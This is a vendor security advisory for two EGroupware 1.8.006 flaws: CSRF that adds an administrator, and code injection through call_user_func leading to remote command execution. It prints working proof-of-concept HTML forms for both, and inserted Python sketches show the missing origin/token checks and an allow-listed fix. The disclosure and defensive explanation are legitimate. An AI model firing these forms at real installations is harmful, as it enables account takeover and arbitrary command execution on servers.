Advisory ID: HTB23212
Product: EGroupware
Vendor: http://www.egroupware.org/
Vulnerable Version(s): 1.8.006 community edition and probably prior
Tested Version: 1.8.006 community edition
Advisory Publication: April 23, 2014 [without technical details]
Vendor Notification: April 23, 2014
Vendor Patch: May 6, 2014
Public Disclosure: May 14, 2014
Vulnerability Type: Cross-Site Request Forgery [CWE-352], Code Injection [CWE-94]
CVE References: CVE-2014-2987, CVE-2014-2988
Risk Level: High
CVSSv2 Base Scores: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P), 8.5 (AV:N/AC:M/Au:S/C:C/I:C/A:C)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered CSRF and Remote Code Execution vulnerabilities in EGroupware, which can be exploited by a remote attacker to gain full control over the application and compromise the vulnerable system.
1) Cross-Site Request Forgery (CSRF) in EGroupware: CVE-2014-2987
The vulnerability exists due to insufficient verification of the HTTP request origin: the administrative "add user" action accepts a plain POST without an anti-CSRF token or an origin check. A remote attacker can create a new user account with administrative privileges by tricking a logged-in EGroupware administrator into visiting a malicious page that carries the CSRF exploit.
The simple CSRF exploit below creates a new administrator with login "immuniweb" and password "immuniweb" (group ID -2 is the built-in "Admins" group of a default installation):
<form action="http://[host]/index.php?menuaction=admin.uiaccounts.add_user" method="post" name="main">
<input type="hidden" name="account_lid" value="immuniweb">
<input type="hidden" name="account_status" value="A">
<input type="hidden" name="account_firstname" value="firstname">
<input type="hidden" name="account_lastname" value="lastname">
<input type="hidden" name="account_passwd" value="immuniweb">
<input type="hidden" name="account_passwd_2" value="immuniweb">
<input type="hidden" name="changepassword" value="1">
<input type="hidden" name="expires" value="2014/04/29">
<input type="hidden" name="never_expires" value="True">
<input type="hidden" name="account_email" value="immuniweb@immuniweb.com">
<input type="hidden" name="account_groups[]" value="-2">
<input type="hidden" name="account_primary_group" value="-2">
<input type="hidden" name="submit" value="Add">
<input type="submit" id="btn">
</form>
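As an added illustration (not code from EGroupware or from this advisory), the Python sketch below shows the two request-origin checks whose absence makes the form above work: a comparison of the Origin (or Referer) header against the application's own origin, and a per-session synchroniser token that a page on another origin cannot read. It replays a constructed copy of the proof-of-concept form body through a hypothetical hardened add_user handler. The origin http://groupware.example, the session table, the handler and the sample requests are all assumptions made for the example.

```python
"""Added example, not code from EGroupware or High-Tech Bridge: a server-side
anti-CSRF check of the kind that would have rejected the add_user form above.

Everything here is hypothetical: the deployment origin, the session table,
the handler name and the sample requests are constructed for the demo."""
import hmac
import secrets
from urllib.parse import parse_qs, urlsplit

APP_ORIGIN = "http://groupware.example"   # assumed origin of the EGroupware install
ADMIN_SESSIONS = {"sess-admin"}           # constructed: session IDs with admin rights

# Per-session synchroniser tokens. A page on another origin cannot read them,
# so a forged form cannot carry the right one.
_session_tokens: dict = {}


def issue_token(session_id: str) -> str:
    """Mint (or reuse) the token the legitimate add-user form would embed."""
    return _session_tokens.setdefault(session_id, secrets.token_hex(16))


def is_same_origin(headers: dict) -> bool:
    """True only if Origin (or, failing that, Referer) names our own origin.

    Browsers send Origin on cross-site POSTs, so a request carrying neither
    header is treated as foreign rather than trusted by default."""
    origin = headers.get("Origin")
    if origin is None:
        referer = headers.get("Referer")
        if referer is None:
            return False
        parts = urlsplit(referer)
        origin = f"{parts.scheme}://{parts.netloc}"
    return origin == APP_ORIGIN


def add_user(session_id: str, headers: dict, body: str) -> str:
    """Hypothetical hardened admin.uiaccounts.add_user handler.

    Returns 'not_admin', 'csrf_rejected' or 'created'. The two CSRF checks
    are independent (origin alone fails when Referer is stripped, the token
    alone fails if it ever leaks), so both must pass."""
    if session_id not in ADMIN_SESSIONS:
        return "not_admin"
    form = {k: v[0] for k, v in parse_qs(body).items()}
    expected = _session_tokens.get(session_id, "")
    supplied = form.get("csrf_token", "")
    # compare_digest keeps the token comparison constant-time.
    token_ok = expected != "" and hmac.compare_digest(expected.encode(), supplied.encode())
    if not is_same_origin(headers) or not token_ok:
        return "csrf_rejected"
    return "created"   # the account creation itself is out of scope here


# Constructed POST body: the fields of the advisory's proof-of-concept form.
POC_BODY = ("account_lid=immuniweb&account_status=A&account_passwd=immuniweb"
            "&account_passwd_2=immuniweb&account_groups%5B%5D=-2"
            "&account_primary_group=-2&submit=Add")


def demo() -> dict:
    """Replay the PoC body under several header/token combinations."""
    admin = "sess-admin"
    token = issue_token(admin)
    foreign = {"Origin": "http://attacker.example"}
    own = {"Origin": APP_ORIGIN}
    referer_only = {"Referer": APP_ORIGIN + "/index.php?menuaction=admin.uiaccounts.add_user"}
    return {
        "poc_from_attacker_page": add_user(admin, foreign, POC_BODY),
        "poc_no_origin_headers": add_user(admin, {}, POC_BODY),
        "same_origin_no_token": add_user(admin, own, POC_BODY),
        "same_origin_with_token": add_user(admin, own, POC_BODY + "&csrf_token=" + token),
        "referer_only_with_token": add_user(admin, referer_only, POC_BODY + "&csrf_token=" + token),
        "non_admin_session": add_user("sess-user", own, POC_BODY),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:26s} -> {result}")
```

The first two cases are the advisory's attack: the administrator's browser attaches the session cookie, but the forged form arrives either with a foreign Origin or with none, and it cannot contain the token. Only a same-origin request carrying the session's token reaches the account-creation step.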
2) Code Injection in EGroupware: CVE-2014-2988
The vulnerability exists due to insufficient sanitisation of input data passed via the HTTP POST "newsettings" parameter to the PHP function call_user_func(). A remote attacker with administrative privileges can make the application call arbitrary PHP functions with attacker-controlled arguments, including system(), and thereby execute arbitrary commands on the target system with the privileges of the web server.
This vulnerability can be exploited in combination with the CSRF vulnerability described above: the same request, embedded in a malicious page, runs with the privileges of any EGroupware administrator who visits it, so the attacker needs no credentials of their own.
The following exploitation example writes the word "immuniweb" into the file "1.php" (the path is relative to the working directory of the web server process, as the command below shows):
<form action="http://[host]/index.php?menuaction=admin.uiconfig.index&appname=phpbrain" method="post" name="main">
<input type="hidden" name="newsettings[system]" value="echo immuniweb>1.php">
<input type="hidden" name="submit" value="Save">
<input type="submit" id="btn">
</form>
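As an added illustration (not code from EGroupware or from this advisory), the Python sketch below mirrors the dispatch pattern behind this bug next to an allow-listed replacement. Judging from the proof-of-concept form, the key of newsettings[...] reached call_user_func() as the function name and the value as its argument, so newsettings[system]=<cmd> became system(<cmd>). The parser for PHP-style bracketed field names, the function names and the settings table are assumptions made for the example; the vulnerable resolver returns the callable it finds and never invokes it.

```python
"""Added example, not code from EGroupware or High-Tech Bridge: the dynamic
dispatch behind CVE-2014-2988, mirrored in Python, beside an allow-listed
replacement. The function names and the settings table are hypothetical."""
import os
import re
from urllib.parse import parse_qs

_BRACKETED = re.compile(r"^(\w+)\[(\w*)\]$")


def parse_php_array(body: str, name: str) -> dict:
    """Collect 'name[key]=value' fields from a form body into {key: value},
    the way PHP builds $_POST[name] from bracketed field names."""
    out = {}
    for field, values in parse_qs(body).items():
        m = _BRACKETED.match(field)
        if m and m.group(1) == name:
            out[m.group(2)] = values[0]
    return out


# --- vulnerable shape: the request chooses the function -----------------------
def resolve_unsafe(func_name: str):
    """Stand-in for call_user_func($name, ...): any name the runtime exposes
    is accepted, os.system included. The callable is returned, not invoked,
    so running this file never executes the attacker's command."""
    return getattr(os, func_name, None)


def vulnerable_apply(body: str) -> dict:
    """Map each submitted key to whatever callable it names."""
    return {key: resolve_unsafe(key) for key in parse_php_array(body, "newsettings")}


# --- hardened shape: the server chooses, the request only supplies values -----
def _set_max_upload_mb(value: str) -> int:
    size = int(value)
    if not 0 < size <= 64:
        raise ValueError("upload limit must be between 1 and 64 MB")
    return size


def _set_site_title(value: str) -> str:
    return value.strip()[:80]


# Hypothetical settings table: the only handlers a request can ever reach.
SETTING_HANDLERS = {
    "max_upload_mb": _set_max_upload_mb,
    "site_title": _set_site_title,
}


def apply_settings(body: str) -> dict:
    """Allow-listed replacement: keys outside SETTING_HANDLERS are reported
    as rejected and never looked up as callables."""
    applied, rejected = {}, []
    for key, value in parse_php_array(body, "newsettings").items():
        handler = SETTING_HANDLERS.get(key)
        if handler is None:
            rejected.append(key)
            continue
        applied[key] = handler(value)
    return {"applied": applied, "rejected": rejected}


# Constructed request bodies: the advisory's PoC, and a benign settings save.
POC_BODY = "newsettings%5Bsystem%5D=echo+immuniweb%3E1.php&submit=Save"
BENIGN_BODY = ("newsettings%5Bmax_upload_mb%5D=16"
               "&newsettings%5Bsite_title%5D=+Intranet+&submit=Save")

if __name__ == "__main__":
    print(parse_php_array(POC_BODY, "newsettings"))
    print(vulnerable_apply(POC_BODY))    # the key 'system' resolves to os.system
    print(apply_settings(POC_BODY))      # {'applied': {}, 'rejected': ['system']}
    print(apply_settings(BENIGN_BODY))
```

The difference is who enumerates the callables: with call_user_func($key, $value) the request names the function and the server merely executes it, whereas with a fixed handler table the request can only pick among functions the server already chose, so a key such as system has nothing to resolve to.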
-----------------------------------------------------------------------------------------------
Solution:
Update to EGroupware version 1.8.007 or later
More Information:
http://www.egroupware.org/forum#nabble-td3997580
http://www.egroupware.org/changelog
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23212 - https://www.htbridge.com/advisory/HTB23212 - CSRF and Remote Code Execution in EGroupware.
[2] EGroupware - http://www.egroupware.org/ - EGroupware is the leading open source collaboration tool and the top choice for big enterprises, SMEs and teams within and across organizations all over the globe.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.